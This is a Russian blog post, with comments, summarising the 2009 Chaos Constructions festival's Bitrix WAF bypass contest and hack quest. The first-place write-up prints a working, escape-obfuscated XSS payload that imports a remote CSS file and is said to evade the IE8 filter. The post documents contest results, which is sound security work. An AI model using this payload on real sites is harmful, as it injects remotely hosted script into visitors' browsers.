Chaos Constructions '2009 (CC09) – подводя итоги

Компьютерный фестиваль CC09 завершен. И после нескольких бессонных ночей начинаем просыпаться, приходить в себя, а потому самое время, чтобы подвести итоги и поделиться впечатлениями.

Мероприятие прошло на позитивной волне (фотки), многие работы (демо && realtime coding) произвели на меня сильное впечатление и оставили приятный шлейф, что присутствую в этом коллективе. Вообще, безусловно, не часто встретишь столько талантливых людей в одном месте. Атмосфера на фестивале была замечательная! Но и имели место быть разного рода косяки с падением каналов и пр. в том числе в хак-зоне... Но они, конечно же, не могли испортить хорошего настроения, в котором все прибывали :)


В этом году CC09 был гораздо масштабнее, чем в предыдущие годы. Например, можно было наблюдать за всем происходящим в режиме реального времени удаленно (трансляция фестиваля велась через youtube). Также, в этом году свой вклад внесла команда Positive Technologies по тематике hack quest и realtime bitrix waf hack (совместно с разработчиками CMS Bitrix). Так как тема по этим конкурсам мне близка, то о них дальше и пойдет речь.

Realtime Bitrix WAF Hack

Обойти Bitrix WAF пытались многие (более 25.000 попыток проведения атаки) и до последних минут завершения конкурса, но обойти фильтры от уязвимостей SQL Injection, Path Traversal/LFI так никто и не сумел. Однако пробить по трем векторам атаки Cross-Site Scripting двум участникам конкурса все-таки удалось. И таблица победителей выглядит следующим образом:

Первое место - Владимир Воронцов (ака d0znp) сумел проэксплуатировать уязвимость типа "Межсайтовое выполнение сценариев" отраженного типа, в том числе, эксплуатация уязвимости была продемонстрирована в обход фильтра IE 8 xss filter. Действительно заслуженное первое место. А вот и сами запросы для атаки:

<style>@\69\6d\70\6f\72\74 'http://onsec.ru/xss.css';</style>
<div style="'\62\65\68\61\76\69\6F\72:">1</div>



Второе место занял человек, скрывающийся под псевдонимом "insa". Он откопал отраженный XSS, причем ошибка содержалась только на игровом сервере (опечатка при подготовке сервера). Но условия конкурса были выполнены, поэтому "insa" получил заслуженное второе место.

Третье место решили отдать "ParanoidChaos", который больше копал не waf, а саму CMS’ку Битрикс. И его раскопки позволили выявить пару незначительных багов – "Раскрытие корневого каталога Web-сервера" в конфигурации отличной от дефолтовой (не на игровом сервере). За проявленный энтузиазм "ParanoidChaos" занял третье место и в момент вручения подарка (коммерческой версии Битрикс) сказал, что продолжит исследования по анализу защищенности этой CMS. Хочется надеяться, что исследования будут носить мирный характер, а не провокационный, как то hack video по эксплуатации XSS в Битриксе, которое демонстрировалось на главном экране фестиваля...(кстати уже fixed).

Hack Quest

В этом году, как я и обещал, был подготовлен интересный хак-квест, который со слов игроков всем понравился. Безусловно, приятно, что работа, которая выполнялась "с душой", была высоко оценена. Из всех подготовленных этапов хак-квеста, только один не смог пройти никто. Это этап по реверсингу программки crackme (главный разработчик систем ИБ в Positive Technologies сумел ее отреверсить за четыре часа). Таблица почета по конкурсу Hack Quest 09:

Первое место присвоено "r0b". Он сумел пройти все этапы конкурса, за исключением этапа с crackme. К сожалению, мы с ним попрощались в районе часа второго дня и на церемонию награждения он не вернулся. Поэтому награждали вторых по количеству заработанных очков – это команда Antichat с результатом в минус один прошедших конкурсов и не раскопавших второго бонусного ключа. Подробности опубликованы на форуме CC.



ЗЫ: в ближайшее будущее опубликую, как нужно было проходить конкурс (и как проходили некоторые его этапы... вернее обходили:))

В целом мероприятие оставило хорошее впечатление, надеюсь, что большинство его со мной разделяют. До новых встреч на подобных мероприятиях!

13 комментариев :

  1. А тяжело будет опубликовать образы с серваков которые надо было сломать?

    Я как не участвующий хотел бы попробовать пройти ;) Думаю, таких много. Например с CTF-ов всяких всегда образы дают.

    ОтветитьУдалить
  2. технически, собсем не тяжело. думаю можно будет выложить... с Тохой согласую и выложу тогда.

    ОтветитьУдалить
  3. классный конкурс был!
    хотя я только 3 квеста выполнил

    спасибо!

    crackme буду реверсить;)

    ОтветитьУдалить
  4. ну что же, завтра/послезавтра виртуалки с этапами конкурсов можно будет скачать на securitylab. если будет желание, то...
    И в скором времени разойдется подробное описание, как нужно (можно) было проходить хак-квест, в том числе, как отреверсить кодовое слово из crackme:)

    ОтветитьУдалить
  5. Дмитрий я бы хотел бы ещё раз поиграться с обходом WAF, который был на конкурсе

    если можно куда-нибудь выложить или пришлите мне копию движка я локально посмотрю

    спасибо

    ОтветитьУдалить
  6. Роман, у тебя же есть лицензионная версия движки Битрикс. Правда, она немного устаревшая. Поставь ее и накати обновления через siteupdate. Там уже пофиксенная версия waf, покопай ее:)

    ОтветитьУдалить
  7. >> завтра/послезавтра виртуалки с этапами конкурсов можно будет скачать на securitylab

    поправка. ожидаем в понедельник 7.09.09

    ОтветитьУдалить
  8. ~~> в ближайшее будущее опубликую, как нужно было проходить конкурс (и как проходили некоторые его этапы... вернее обходили:))

    очень хотелось бы почитать, нет хоть приблизительной даты появления публикации?

    ОтветитьУдалить
  9. предположительно, описание по прохождению будет опубликовано на следующей неделе. я даже думаю в понедельник (14.09.09). первоисточник - party.cc.org.ru. если нам разрешат, то скопипастим на секлаб:) ну и тут, конечно распишу что-нить интересное...

    ОтветитьУдалить
  10. уже 19 число, не передумали вы написать прохождение?

    ОтветитьУдалить
  11. прохождение было написано еще до начала CC:)
    сейчас процесс завис на Токсе... он должен был опубликовать на этой неделе. но, вот уже 19-ое число... я в свою очередь (по этическим соображениям) тоже не могу опубликовать до момента, когда это не появится на оф. сайте мероприятия party.cc.org.ru ждем...

    ОтветитьУдалить
  12. Итоги CC09 Bitrix Waf на английский манер:
    1. http://www.bitrixsoft.com/company/blog/Alex_Reznor/1260.php
    2. http://gordeys.blogspot.com/2009/10/some-plug-about-bitrix.html

    ОтветитьУдалить